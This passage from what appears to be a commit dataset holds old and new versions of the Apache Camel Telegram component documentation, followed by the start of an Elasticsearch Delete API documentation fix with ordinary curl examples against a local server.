`OutgoingAudioMessage` | To send an mp3 audio to a chat\n| `OutgoingVideoMessage` | To send an mp4 video to a chat\n| `OutgoingDocumentMessage` | To send a file to a chat (any media type)\n| `OutgoingStickerMessage` | To send a sticker to a chat (WEBP)\n| `EditMessageTextMessage` | To edit text and game messages (editMessageText)\n| `EditMessageCaptionMessage` | To edit captions of messages (editMessageCaption)\n| `EditMessageMediaMessage` | To edit animation, audio, document, photo, or video messages (editMessageMedia)\n| `EditMessageReplyMarkupMessage` | To edit only the reply markup of a message (editMessageReplyMarkup)\n| `EditMessageDelete` | To delete a message, including service messages 
(deleteMessage)\n| `SendLocationMessage` | To send a location (setSendLocation)\n| `EditMessageLiveLocationMessage` | To send changes to a live location (editMessageLiveLocation)\n| `StopMessageLiveLocationMessage` | To stop updating a live location message sent by the bot or via the bot (for inline bots) before live_period expires (stopMessageLiveLocation)\n| `SendVenueMessage` | To send information about a venue (sendVenue)\n| `byte[]` | To send any supported media type. It requires the `CamelTelegramMediaType` header to be set to the appropriate media type\n| `String` | To send a text message to a chat. It gets converted automatically into an `OutgoingTextMessage`\n\n|===================================================\n\n\n== Consumer Example\n\nThe following is a basic example of how to receive all messages that Telegram users are sending to the configured Bot.\nIn Java DSL:\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.bean(ProcessorBean.class)\n---------------------------------------------------------\n\nor in Spring XML:\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <bean ref=\"myBean\" \/>\n<\/route>\n\n<bean id=\"myBean\" class=\"com.example.MyBean\"\/>\n---------------------------------------------\n\n`MyBean` is a simple bean that will receive the messages:\n\n[source,java]\n---------------------------------------------------------\npublic class MyBean {\n\n public void process(String message) {\n \/\/ or Exchange, or org.apache.camel.component.telegram.model.IncomingMessage (or both)\n\n \/\/ do process\n }\n\n}\n---------------------------------------------------------\n\n\nSupported types for incoming messages are:\n\n[width=\"100%\",cols=\"40%,60%\",options=\"header\",]\n|===================================================\n| Java Type | Description\n\n| `IncomingMessage` | The full object representation of an incoming message\n| `String` | The content of the message, for text messages only\n\n|===================================================\n\n\n\n\n== Reactive Chat-Bot Example\n\nThe reactive chat-bot mode is a simple way of using the Camel component to build a\nchat bot that replies directly to chat messages received from Telegram users.\n\nThe following is a basic configuration of the chat-bot in Java DSL:\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.bean(ChatBotLogic.class)\n.to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nor in Spring XML:\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <bean ref=\"chatBotLogic\" \/>\n <to uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n<\/route>\n\n<bean id=\"chatBotLogic\" class=\"com.example.ChatBotLogic\"\/>\n---------------------------------------------\n\n\n`ChatBotLogic` is a simple bean that implements a generic String-to-String method.\n\n[source,java]\n---------------------------------------------------------\npublic class ChatBotLogic {\n\n public String chatBotProcess(String message) {\n if (\"do-not-reply\".equals(message)) {\n return null; \/\/ no response in the chat\n }\n\n return \"echo from the bot: 
\" + message; \/\/ echoes the message\n }\n\n}\n---------------------------------------------------------\n\n\nEvery non-null string returned by the `chatBotProcess` method is automatically routed to the\nchat that originated the request (as the `CamelTelegramChatId` header is used to route the message).\n\n== Getting the Chat ID\n\nIf you want to push messages to a specific Telegram chat when an event occurs, you need to\nretrieve the corresponding chat ID. The chat ID is not currently shown in the telegram client,\nbut you can obtain it using a simple route.\n\nFirst, add the bot to the chat where you want to push messages, then run a route like the following one.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.to(\"log:INFO?showHeaders=true\");\n---------------------------------------------------------\n\nAny message received by the bot will be dumped to your log together with information about the chat (`CamelTelegramChatId`\nheader).\n\nOnce you get the chat ID, you can use the following sample route to push message to it.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"timer:tick\")\n.setBody().constant(\"Hello\")\nto(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere?chatId=123456\")\n---------------------------------------------------------\n\nNote that the corresponding URI parameter is simply `chatId`.\n\n== Customizing keyboard\n\nYou can customize the user keyboard instead of asking him to write an option. `OutgoingTextMessage` has the property `ReplyKeyboardMarkup` which can be used for such thing.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n .process(exchange -> {\n\n OutgoingTextMessage msg = new OutgoingTextMessage();\n msg.setText(\"Choose one option!\");\n\n InlineKeyboardButton buttonOptionOneI = InlineKeyboardButton.builder()\n .text(\"Option One - I\").build();\n\n InlineKeyboardButton buttonOptionOneII = InlineKeyboardButton.builder()\n .text(\"Option One - II\").build();\n\n InlineKeyboardButton buttonOptionTwoI = InlineKeyboardButton.builder()\n .text(\"Option Two - I\").build();\n\n ReplyKeyboardMarkup replyMarkup = ReplyKeyboardMarkup.builder()\n .keyboard()\n .addRow(Arrays.asList(buttonOptionOneI, buttonOptionOneII))\n .addRow(Arrays.asList(buttonOptionTwoI))\n .close()\n .oneTimeKeyboard(true)\n .build();\n\n msg.setReplyKeyboardMarkup(replyMarkup);\n\n exchange.getIn().setBody(msg);\n })\n .to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nIf you want to disable it the next message must have the property `removeKeyboard` set on `ReplyKeyboardMarkup` object.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n .process(exchange -> {\n\n OutgoingTextMessage msg = new OutgoingTextMessage();\n msg.setText(\"Your answer was accepted!\");\n\n ReplyKeyboardMarkup replyMarkup = ReplyKeyboardMarkup.builder()\n .removeKeyboard(true)\n .build();\n\n msg.setReplyKeyboardMarkup(replyMarkup);\n\n exchange.getIn().setBody(msg);\n })\n .to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\n\n== Webhook Mode\n\nThe Telegram component supports usage in the *webhook mode* using the 
*camel-webhook* component.\n\nIn order to enable webhook mode, users need first to add a REST implementation to their application.\nMaven users, for example, can add *netty-http* to their `pom.xml` file:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-netty-http<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\nOnce done, you need to prepend the webhook URI to the telegram URI you want to use.\n\nIn Java DSL:\n\n[source,java]\n---------------------------------------------------------\nfrom(\"webhook:telegram:bots\/123456789:insertYourAuthorizationTokenHere\").to(\"log:info\");\n---------------------------------------------------------\n\nSome endpoints will be exposed by your application and Telegram will be configured to send messages to them.\nYou need to ensure that your server is exposed to the internet and to pass the right value of the\n*camel.component.webhook.configuration.webhook-external-url* property.\n\nRefer to the *camel-webhook* component documentation for instructions on how to set it.\n","old_contents":"[[telegram-component]]\n= Telegram Component\n:page-source: components\/camel-telegram\/src\/main\/docs\/telegram-component.adoc\n\n*Since Camel 2.18*\n\n\/\/ HEADER START\n*Both producer and consumer is supported*\n\/\/ HEADER END\n\nThe Telegram component provides access to the https:\/\/core.telegram.org\/bots\/api[Telegram Bot API].\nIt allows a Camel-based application to send and receive messages by acting as a Bot, participating in\ndirect conversations with normal users, private and public groups or channels.\n\nA Telegram Bot must be created before using this component, following the instructions at the\nhttps:\/\/core.telegram.org\/bots#3-how-do-i-create-a-bot[Telegram Bot developers home].\nWhen a new Bot is created, the https:\/\/telegram.me\/botfather[BotFather] provides an\n**authorization token** corresponding to the Bot. The authorization token is a mandatory parameter\nfor the camel-telegram endpoint.\n\nNOTE: In order to allow the Bot to receive all messages exchanged within a group or channel (not just\nthe ones starting with a '\/' character), ask the BotFather to *disable the privacy mode*, using the\n*\/setprivacy* command.\n\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-telegram<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\n== URI format\n\n[source,text]\n----------------------------------------------------\ntelegram:type\/authorizationToken[?options]\n----------------------------------------------------\n\nYou can append query options to the URI in the following format,\n`?option=value&option=value&...`\n\n== Options\n\n\/\/ component options: START\nThe Telegram component supports 7 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *authorizationToken* (security) | The default Telegram authorization token to be used when the information is not provided in the endpoints. 
| | String\n| *client* (advanced) | To use a custom AsyncHttpClient | | AsyncHttpClient\n| *clientConfig* (advanced) | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. | | AsyncHttpClientConfig\n| *baseUri* (advanced) | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | https:\/\/api.telegram.org | String\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\/\/ endpoint options: START\nThe Telegram endpoint is configured using URI syntax:\n\n----\ntelegram:type\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *type* | *Required* The endpoint type. Currently, only the 'bots' type is supported. | | String\n|===\n\n\n=== Query Parameters (31 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | boolean\n| *limit* (consumer) | Limit on the number of updates that can be received in a single polling request. | 100 | Integer\n| *sendEmptyMessageWhenIdle* (consumer) | If the polling consumer did not poll any files, you can enable this option to send an empty message (no body) instead. | false | boolean\n| *timeout* (consumer) | Timeout in seconds for long polling. Put 0 for short polling or a bigger number for long polling. Long polling produces shorter response time. | 30 | Integer\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions, that will be logged at WARN or ERROR level and ignored. 
| | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. | | ExchangePattern\n| *pollStrategy* (consumer) | A pluggable org.apache.camel.PollingConsumerPollingStrategy allowing you to provide your custom implementation to control error handling usually occurred during the poll operation before an Exchange have been created and being routed in Camel. | | PollingConsumerPollStrategy\n| *chatId* (producer) | The identifier of the chat that will receive the produced messages. Chat ids can be first obtained from incoming messages (eg. when a telegram user starts a conversation with a bot, its client sends automatically a '\/start' message containing the chat id). It is an optional parameter, as the chat id can be set dynamically for each outgoing message (using body or headers). | | String\n| *lazyStartProducer* (producer) | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | boolean\n| *baseUri* (advanced) | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | | String\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *bufferSize* (advanced) | The initial in-memory buffer size used when transferring data between Camel and AHC Client. | 4096 | int\n| *clientConfig* (advanced) | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. | | AsyncHttpClientConfig\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *backoffErrorThreshold* (scheduler) | The number of subsequent error polls (failed due some error) that should happen before the backoffMultipler should kick-in. | | int\n| *backoffIdleThreshold* (scheduler) | The number of subsequent idle polls that should happen before the backoffMultipler should kick-in. | | int\n| *backoffMultiplier* (scheduler) | To let the scheduled polling consumer backoff if there has been a number of subsequent idles\/errors in a row. The multiplier is then the number of polls that will be skipped before the next actual attempt is happening again. When this option is in use then backoffIdleThreshold and\/or backoffErrorThreshold must also be configured. | | int\n| *delay* (scheduler) | Milliseconds before the next poll. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). | 500 | long\n| *greedy* (scheduler) | If greedy is enabled, then the ScheduledPollConsumer will run immediately again, if the previous run polled 1 or more messages. | false | boolean\n| *initialDelay* (scheduler) | Milliseconds before the first poll starts. You can also specify time values using units, such as 60s (60 seconds), 5m30s (5 minutes and 30 seconds), and 1h (1 hour). 
| 1000 | long\n| *repeatCount* (scheduler) | Specifies a maximum limit of number of fires. So if you set it to 1, the scheduler will only fire once. If you set it to 5, it will only fire five times. A value of zero or negative means fire forever. | 0 | long\n| *runLoggingLevel* (scheduler) | The consumer logs a start\/complete log line when it polls. This option allows you to configure the logging level for that. | TRACE | LoggingLevel\n| *scheduledExecutorService* (scheduler) | Allows for configuring a custom\/shared thread pool to use for the consumer. By default each consumer has its own single threaded thread pool. | | ScheduledExecutorService\n| *scheduler* (scheduler) | To use a cron scheduler from either camel-spring or camel-quartz component | none | String\n| *schedulerProperties* (scheduler) | To configure additional properties when using a custom scheduler or any of the Quartz, Spring based scheduler. | | Map\n| *startScheduler* (scheduler) | Whether the scheduler should be auto started. | true | boolean\n| *timeUnit* (scheduler) | Time unit for initialDelay and delay options. | MILLISECONDS | TimeUnit\n| *useFixedDelay* (scheduler) | Controls if fixed delay or fixed rate is used. See ScheduledExecutorService in JDK for details. | true | boolean\n| *proxyHost* (proxy) | HTTP proxy host which could be used when sending out the message. | | String\n| *proxyPort* (proxy) | HTTP proxy port which could be used when sending out the message. | | Integer\n| *authorizationToken* (security) | *Required* The authorization token for using the bot (ask the BotFather) | | String\n|===\n\/\/ endpoint options: END\n\/\/ spring-boot-auto-configure options: START\n== Spring Boot Auto-Configuration\n\nWhen using Spring Boot make sure to use the following Maven dependency to have support for auto configuration:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel.springboot<\/groupId>\n <artifactId>camel-telegram-starter<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n\nThe component supports 8 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *camel.component.telegram.authorization-token* | The default Telegram authorization token to be used when the information is not provided in the endpoints. | | String\n| *camel.component.telegram.base-uri* | Set an alternative base URI, e.g. when you want to test the component against a mock Telegram API. | | String\n| *camel.component.telegram.basic-property-binding* | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | Boolean\n| *camel.component.telegram.bridge-error-handler* | Allows for bridging the consumer to the Camel routing Error Handler, which mean any exceptions occurred while the consumer is trying to pickup incoming messages, or the likes, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions, that will be logged at WARN or ERROR level and ignored. | false | Boolean\n| *camel.component.telegram.client* | To use a custom AsyncHttpClient. The option is a org.asynchttpclient.AsyncHttpClient type. | | String\n| *camel.component.telegram.client-config* | To configure the AsyncHttpClient to use a custom com.ning.http.client.AsyncHttpClientConfig instance. 
The option is a org.asynchttpclient.AsyncHttpClientConfig type. | | String\n| *camel.component.telegram.enabled* | Whether to enable auto configuration of the telegram component. This is enabled by default. | | Boolean\n| *camel.component.telegram.lazy-start-producer* | Whether the producer should be started lazy (on the first message). By starting lazy you can use this to allow CamelContext and routes to startup in situations where a producer may otherwise fail during starting and cause the route to fail being started. By deferring this startup to be lazy then the startup failure can be handled during routing messages via Camel's routing error handlers. Beware that when the first message is processed then creating and starting the producer may take a little time and prolong the total processing time of the processing. | false | Boolean\n|===\n\/\/ spring-boot-auto-configure options: END\n\n\n\n\n\n== Message Headers\n\n[width=\"100%\",cols=\"20%,80%\",options=\"header\",]\n|=======================================================================\n|Name |Description\n|`CamelTelegramChatId` |This header is used by the producer endpoint in order to\nresolve the chat id that will receive the message. The recipient chat id can be\nplaced (in order of priority) in message body, in the `CamelTelegramChatId` header\nor in the endpoint configuration (`chatId` option).\nThis header is also present in all incoming messages.\n\n|`CamelTelegramMediaType` |This header is used to identify the media type when\nthe outgoing message is composed of pure binary data. Possible values are strings or enum values\nbelonging to the `org.apache.camel.component.telegram.TelegramMediaType` enumeration.\n\n|`CamelTelegramMediaTitleCaption` |This header is used to provide a caption or title\nfor outgoing binary messages.\n\n|`CamelTelegramParseMode` |This header is used to format text messages using HTML or Markdown (see `org.apache.camel.component.telegram.TelegramParseMode`).\n\n|=======================================================================\n\n== Usage\n\nThe Telegram component supports both consumer and producer endpoints.\nIt can also be used in *reactive chat-bot mode* (to consume, then produce messages).\n\n== Producer Example\n\nThe following is a basic example of how to send a message to a Telegram chat through the\nTelegram Bot API.\n\nin Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"direct:start\").to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"direct:start\"\/>\n <to uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n<route>\n---------------------------------------------\n\nThe code `123456789:insertYourAuthorizationTokenHere` is the *authorization token* corresponding to the Bot.\n\nWhen using the producer endpoint without specifying the *chat id* option, the target chat will be identified using information contained in the body or headers of the message.\nThe following message bodies are allowed for a producer endpoint (messages of type `OutgoingXXXMessage` belong to the package `org.apache.camel.component.telegram.model`)\n\n[width=\"100%\",cols=\"40%,60%\",options=\"header\",]\n|===================================================\n| Java Type | Description\n\n| `OutgoingTextMessage` | To send a text message to a chat\n| `OutgoingPhotoMessage` | To 
send a photo (JPG, PNG) to a chat\n| `OutgoingAudioMessage` | To send a mp3 audio to a chat\n| `OutgoingVideoMessage` | To send a mp4 video to a chat\n| `OutgoingDocumentMessage` | To send a file to a chat (any media type)\n| `OutgoingStickerMessage` | To send a sticker to a chat (WEBP)\n| `SendLocationMessage` | To send a location (setSendLocation)\n| `EditMessageLiveLocationMessage` | To send changes to a live location (editMessageLiveLocation)\n| `StopMessageLiveLocationMessage` | To stop updating a live location message sent by the bot or via the bot (for inline bots) before live_period expires (stopMessageLiveLocation)\n| `SendVenueMessage` | To send information about a venue (sendVenue)\n| `byte[]` | To send any media type supported. It requires the `CamelTelegramMediaType` header to be set to the appropriate media type\n| `String` | To send a text message to a chat. It gets converted automatically into a `OutgoingTextMessage`\n\n|===================================================\n\n\n== Consumer Example\n\nThe following is a basic example of how to receive all messages that telegram users are sending to the configured Bot.\nIn Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.bean(ProcessorBean.class)\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <bean ref=\"myBean\" \/>\n<route>\n\n<bean id=\"myBean\" class=\"com.example.MyBean\"\/>\n---------------------------------------------\n\nThe `MyBean` is a simple bean that will receive the messages\n\n[source,java]\n---------------------------------------------------------\npublic class MyBean {\n\n public void process(String message) {\n \/\/ or Exchange, or org.apache.camel.component.telegram.model.IncomingMessage (or both)\n\n \/\/ do process\n }\n\n}\n---------------------------------------------------------\n\n\nSupported types for incoming messages are\n\n[width=\"100%\",cols=\"40%,60%\",options=\"header\",]\n|===================================================\n| Java Type | Description\n\n| `IncomingMessage` | The full object representation of an incoming message\n| `String` | The content of the message, for text messages only\n\n|===================================================\n\n\n\n\n== Reactive Chat-Bot Example\n\nThe reactive chat-bot mode is a simple way of using the Camel component to build a simple\nchat bot that replies directly to chat messages received from the Telegram users.\n\nThe following is a basic configuration of the chat-bot in Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.bean(ChatBotLogic.class)\n.to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <bean ref=\"chatBotLogic\" \/>\n <to uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n<route>\n\n<bean id=\"chatBotLogic\" class=\"com.example.ChatBotLogic\"\/>\n---------------------------------------------\n\n\nThe `ChatBotLogic` is a simple bean that implements a generic String-to-String 
\n== Reactive Chat-Bot Example\n\nThe reactive chat-bot mode is an easy way of using the Camel component to build a simple\nchat bot that replies directly to chat messages received from the Telegram users.\n\nThe following is a basic configuration of the chat-bot in Java DSL\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.bean(ChatBotLogic.class)\n.to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nor in Spring XML\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <bean ref=\"chatBotLogic\" \/>\n <to uri=\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n<\/route>\n\n<bean id=\"chatBotLogic\" class=\"com.example.ChatBotLogic\"\/>\n---------------------------------------------\n\n\nThe `ChatBotLogic` is a simple bean that implements a generic String-to-String method.\n\n[source,java]\n---------------------------------------------------------\npublic class ChatBotLogic {\n\n public String chatBotProcess(String message) {\n if( \"do-not-reply\".equals(message) ) {\n return null; \/\/ no response in the chat\n }\n\n return \"echo from the bot: \" + message; \/\/ echoes the message\n }\n\n}\n---------------------------------------------------------\n\n\nEvery non-null string returned by the `chatBotProcess` method is automatically routed to the\nchat that originated the request (as the `CamelTelegramChatId` header is used to route the message).\n\n== Getting the Chat ID\n\nIf you want to push messages to a specific Telegram chat when an event occurs, you need to\nretrieve the corresponding chat ID. The chat ID is not currently shown in the telegram client,\nbut you can obtain it using a simple route.\n\nFirst, add the bot to the chat where you want to push messages, then run a route like the following one.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n.to(\"log:INFO?showHeaders=true\");\n---------------------------------------------------------\n\nAny message received by the bot will be dumped to your log together with information about the chat (`CamelTelegramChatId`\nheader).\n\nOnce you get the chat ID, you can use the following sample route to push messages to it.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"timer:tick\")\n.setBody().constant(\"Hello\")\n.to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere?chatId=123456\");\n---------------------------------------------------------\n\nNote that the corresponding URI parameter is simply `chatId`.\n
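\nAlternatively, the chat id can be set per message through the `CamelTelegramChatId` header (which, as described above, takes priority over the endpoint option). A minimal sketch of the same route using the header:\n\n[source,java]\n---------------------------------------------------------\nfrom(\"timer:tick\")\n.setBody().constant(\"Hello\")\n\/\/ the header overrides any chatId configured on the endpoint\n.setHeader(\"CamelTelegramChatId\", constant(\"123456\"))\n.to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n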
\n== Customizing keyboard\n\nYou can present the user with a custom keyboard instead of asking them to type an option.\n`OutgoingTextMessage` has the property `ReplyKeyboardMarkup`, which can be used for this purpose.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n .process(exchange -> {\n\n OutgoingTextMessage msg = new OutgoingTextMessage();\n msg.setText(\"Choose one option!\");\n\n InlineKeyboardButton buttonOptionOneI = InlineKeyboardButton.builder()\n .text(\"Option One - I\").build();\n\n InlineKeyboardButton buttonOptionOneII = InlineKeyboardButton.builder()\n .text(\"Option One - II\").build();\n\n InlineKeyboardButton buttonOptionTwoI = InlineKeyboardButton.builder()\n .text(\"Option Two - I\").build();\n\n ReplyKeyboardMarkup replyMarkup = ReplyKeyboardMarkup.builder()\n .keyboard()\n .addRow(Arrays.asList(buttonOptionOneI, buttonOptionOneII))\n .addRow(Arrays.asList(buttonOptionTwoI))\n .close()\n .oneTimeKeyboard(true)\n .build();\n\n msg.setReplyKeyboardMarkup(replyMarkup);\n\n exchange.getIn().setBody(msg);\n })\n .to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\nTo remove the custom keyboard, the next message must have the `removeKeyboard` property set on its `ReplyKeyboardMarkup` object.\n\n[source,java]\n---------------------------------------------------------\nfrom(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\")\n .process(exchange -> {\n\n OutgoingTextMessage msg = new OutgoingTextMessage();\n msg.setText(\"Your answer was accepted!\");\n\n ReplyKeyboardMarkup replyMarkup = ReplyKeyboardMarkup.builder()\n .removeKeyboard(true)\n .build();\n\n msg.setReplyKeyboardMarkup(replyMarkup);\n\n exchange.getIn().setBody(msg);\n })\n .to(\"telegram:bots\/123456789:insertYourAuthorizationTokenHere\");\n---------------------------------------------------------\n\n\n== Webhook Mode\n\nThe Telegram component supports usage in the *webhook mode* using the *camel-webhook* component.\n\nIn order to enable webhook mode, users first need to add a REST implementation to their application.\nMaven users, for example, can add *netty-http* to their `pom.xml` file:\n\n[source,xml]\n------------------------------------------------------------\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-netty-http<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n------------------------------------------------------------\n\nOnce done, you need to prepend the webhook URI to the telegram URI you want to use.\n\nIn Java DSL:\n\n[source,java]\n---------------------------------------------------------\nfrom(\"webhook:telegram:bots\/123456789:insertYourAuthorizationTokenHere\").to(\"log:info\");\n---------------------------------------------------------\n
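\nor, as a sketch following the same conventions as the earlier Spring XML examples:\n\n[source,xml]\n---------------------------------------------\n<route>\n <from uri=\"webhook:telegram:bots\/123456789:insertYourAuthorizationTokenHere\"\/>\n <to uri=\"log:info\"\/>\n<\/route>\n---------------------------------------------\n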
\nSome endpoints will be exposed by your application and Telegram will be configured to send messages to them.\nYou need to ensure that your server is exposed to the internet and to pass the right value of the\n*camel.component.webhook.configuration.webhook-external-url* property.\n\nRefer to the *camel-webhook* component documentation for instructions on how to set it.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c09760f73d5aafa4e1f7a7b57b80c4d79f2e8ade","subject":"Fix malformed JSON in Delete API example (#21168)","message":"Fix malformed JSON in Delete API example (#21168)\n\nObviously, there should be\r\n\r\n \"result\": \"deleted\"\r\n\r\ninstead of\r\n\r\n \"result: deleted\"","repos":"strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc,strapdata\/elassandra5-rc","old_file":"docs\/reference\/docs\/delete.asciidoc","new_file":"docs\/reference\/docs\/delete.asciidoc","new_contents":"[[docs-delete]]\n== Delete API\n\nThe delete API allows you to delete a typed JSON document from a specific\nindex based on its id. The following example deletes the JSON document\nfrom an index called twitter, under a type called tweet, with id valued\n1:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1'\n--------------------------------------------------\n\nThe result of the above delete operation is:\n\n[source,js]\n--------------------------------------------------\n{\n \"_shards\" : {\n \"total\" : 10,\n \"failed\" : 0,\n \"successful\" : 10\n },\n \"found\" : true,\n \"_index\" : \"twitter\",\n \"_type\" : \"tweet\",\n \"_id\" : \"1\",\n \"_version\" : 2,\n \"result\": \"deleted\"\n}\n--------------------------------------------------\n\n[float]\n[[delete-versioning]]\n=== Versioning\n\nEach document indexed is versioned. When deleting a document, the\n`version` can be specified to make sure the relevant document we are\ntrying to delete is actually being deleted and it has not changed in the\nmeantime. Every write operation executed on a document, deletes included,\ncauses its version to be incremented.\n\n[float]\n[[delete-routing]]\n=== Routing\n\nWhen indexing using the ability to control the routing, in order to\ndelete a document, the routing value should also be provided. For\nexample:\n\n[source,js]\n--------------------------------------------------\n$ curl -XDELETE 'http:\/\/localhost:9200\/twitter\/tweet\/1?routing=kimchy'\n--------------------------------------------------\n\nThe above will delete a tweet with id 1, but will be routed based on the\nuser. Note that issuing a delete without the correct routing will cause the\ndocument to not be deleted.\n\nWhen the `_routing` mapping is set as `required` and no routing value is\nspecified, the delete api will throw a `RoutingMissingException` and reject\nthe 